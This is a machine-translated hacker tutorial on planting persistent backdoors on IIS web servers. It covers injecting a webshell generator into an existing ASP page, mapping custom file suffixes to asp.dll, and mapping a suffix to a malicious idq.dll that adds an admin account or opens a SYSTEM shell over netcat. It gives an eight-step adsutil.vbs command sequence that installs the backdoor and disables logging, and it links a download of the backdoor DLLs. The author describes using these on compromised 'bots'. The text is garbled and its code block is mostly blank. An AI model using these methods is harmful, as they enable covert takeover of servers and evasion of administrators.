In-depth research on ASP backdoor placement methods

Author: LCX Source: hacker X file

Even if you have changed the original code variable and escaped anti-virus software, the careful administrator will find that there will be an additional ASP file in the web directory of his website. To solve this problem, I tried two methods: ASP injection (as if the word is really popular) and ASP. dll in IIS manager to parse any suffix. These two methods are not technical, but they are a good idea. If you think more deeply along this line of thinking, you can configure a wonderful IIS backdoor. Details are as follows:

ASP injection, one of the ASP backdoor placement methods. First look at Figure 1:

This is a dynamic network Article management login page on my local machine. It is similar to the usual one, and its original functions exist. Let's look at the second figure:

Comparison:
The URL in Figure 1 is http: // 192.168.1.3/asp/WZ/admin. asp.
Figure 2 is http: // 192.168.1.3/asp/WZ/admin. asp? Id = 1. A parameter "? Id = 1 "is an additional item. In Figure 2, you can enter a file name in the front input box and copy any code you want in the text box below, click Generate button to generate Web webshells or arbitrary text files such as CGI, ASP, PHP, and aspx on the server. How is this done? You just need to modify the code as prompted and insert the code at the bottom of an ASP Web page.

Program code:

 
 
Value = >
 
 
 
 

It is worth noting that this Code requires the server to support FSO, and it does not take effect in all ASP files. For example, the inserted ASP file contains code, that is This code will not take effect, but will not affect the use of the original file. If you write ASP, you can also write some asp backdoors directly in the original ASP files of broilers.

ASP backdoor placement method 2 ASP. dll is used in IIS manager to parse any suffix. In this way, choose Control Panel> Administrative Tools> Internet Service Manager> Web site> right-click Properties> Home directory> Configuration> Add. I added a file ing suffix LCX, Which is parsed using ASP. dll under NT/system32. Figure 3:

After this is done, we change the commonly used cmd. asp to cmd. LCX and run it. What will happen to you? Figure 4:

It is also a webshell. Of course, it seems more concealed to start a suffix. it's wise to look at your cleverness.

In-depth research on ASP backdoor placement methods. I used ASP. DLL to Parse Files suffixed with LCX. What if we use a special DLL program to parse the. LCX suffix? If you program the program, you can write a DLL program as needed. No? Ha, Yuan ge of lumeng has already written for us. The idq. dll is the one you think of. You can use ISPC to connect to idq. dll in the scripts directory. U vulnerability. Now I have used this idq. dll to perform ASP ing Based on ASP backdoor method 2. What will happen? You can use it to do two things. You can run http: // targetip/anything. LCX to add an iisuser to the host with the password abcd1234. Figure 5:

You can rename XXX. LCX as you like. This file does not exist on the host. If you are not satisfied, use NC to log on to the host. Enter the following command. NC targetip 80
Post/% 08/anything. LCX, how? Log on to it. In w2k + SP3, it is the system permission. Figure 6:

I will not talk about the principle here. You can check the IIS configuration file backdoor written by tombkeeper PGN in aligreennet. Czy also wrote the same DLL program, which is used to execute http: // ip/* in IE. What suffix do you set? Shell = the command you want. Let's take a look at the backdoor I used on the zombie. I used it to parse the suffix of. pH4. Figure 7:
As you may have said, this IIS backdoor is easy to install on the 3389 terminal. What about the command line? We also have a solution. By default, 19 vbs scripts are generated under the/inetpub/adminscripts directory. We can use one of adsutil. vbs to install this wonderful IIS backdoor.

The method is as follows. Let's take eight steps to see the joy of the command line:

1 copy idq. dll % SystemRoot %/system32/iisapi. dll
Copy idq. dll to the System32 directory of the system disk and rename it iisapid. ll.

2. Determine the site to be considered.
Cscript adsutil. vbs Enum/P/w3svc
[/W3svc/info]
[/W3svc/filters]
[/W3svc/2] -----------> these are virtual sites.
[/W3svc/3]
[/W3svc/4]
[/W3svc/1]

3. obtain all the IIS-authorized DLL files.
Adsutil. vbs set/w3svc/inprocessisapiapps
Find the following DLL
"C:/winnt/system32/idq. DLL "" C:/winnt/system32/inetsrv/httpext. DLL "" C:/winnt/system32/inetsrv/httpodbc. DLL "" C:/winnt/system32/inetsrv/ssinc. DLL "" C:/winnt/system32/msw3prt. DLL"

4. Set all privileged iis dll files and iisapi. DLL files copied in step 1 to the inprocessisapiapps group. In this way, our backdoor files have the local_system permission. Add the DLL found in step 3 here. If you do not add the DLL, the original privilege will be deleted in the DLL.
Cscript adsutil. vbs set/w3svc/inprocessisapiapps "C:/winnt/system32/idq. DLL "" C:/winnt/system32/inetsrv/httpext. DLL "" C:/winnt/system32/inetsrv/httpodbc. DLL "" C:/winnt/system32/inetsrv/ssinc. DLL "" C:/winnt/system32/msw3prt. DLL "" C:/winnt/system32/iisapi. DLL"

5. Set ing
Cscript adsutil. vbs set/w3svc/scriptmaps
". Asp, C:/winnt/system32/inetsrv/asp. dll, 1, get, Head, post, trace"
". CER, C:/winnt/system32/inetsrv/asp. dll, 1, get, Head, post, trace"
". Asa, C:/winnt/system32/inetsrv/asp. dll, 1, get, Head, post, trace"
". IDC, C:/winnt/system32/inetsrv/httpodbc. dll, 1, options, get, Head, post, put, delete, trace"
". Shtm, C:/winnt/system32/inetsrv/ssinc. dll, 1, get, Post"
". Shtml, C:/winnt/system32/inetsrv/ssinc. dll, 1, get, Post"
". Stm, C:/winnt/system32/inetsrv/ssinc. dll, 1, get, Post"
". LCX, C:/winnt/system32/iisapi. dll, 3, get, Head, Post"
By default, a ing is added to the original IIS manager. LCX ing, using the iisapi we copied. DLL to parse, note that the last line is added. LCX ing. You can add some extension name ing.

6. Add a virtual directory and set its attributes.
Cscript adsutil. vbs create/w3svc/2/root (directory name: Root)
Cscript adsutil. vbs set w3svc/2/root/keytype "iiswebvirtualdir"
Cscript adsutil. vbs set w3svc/2/root/approot "/lm/w3svc/2/root"
Cscript adsutil. vbs set w3svc/2/root/appfriendlyname "root"
Cscript adsutil. vbs set w3svc/2/root/appisolated 2
Cscript adsutil. vbs set w3svc/2/root/accessread true
Cscript adsutil. vbs set w3svc/2/root/accessexecute true
Cscript adsutil. vbs set w3svc/2/root/accessscript true

7. Add the ing of the virtual directory root. LCX and use iisapi. DLL for parsing.
Cscript adsutil. vbs set w3svc/2/root/scriptmaps ". LCX, C:/winnt/system32/iisapi. dll, 1"

8. No logs are recorded.
Adsutil. vbs set/w3svc/1/root/dontlog true

It must be noted that adsutil. although I have been studying the vbs command for a long time, I used the above command to test three bots and my local machine and only succeeded two. The result is that the IIS configuration is successful only when it is not modified by default. Why is that? I 'd like to look forward to studying this script and the IIS ISAPI experts in the magazine. But in the IIS graphics manager, this backdoor is a hundred percent successful.

It should be said that the backdoors configured in these three methods are currently the best backdoors. But what do you want to do with bots? :-) Let's take a look at the figure I caught on the machine. You will understand that the best bot is our computer. For your convenience, I package idq. dll, czy. dll, and adsutil. vbs on my website,

The download URL is http://www.haiyang.net/safety/htm/iisback.rar.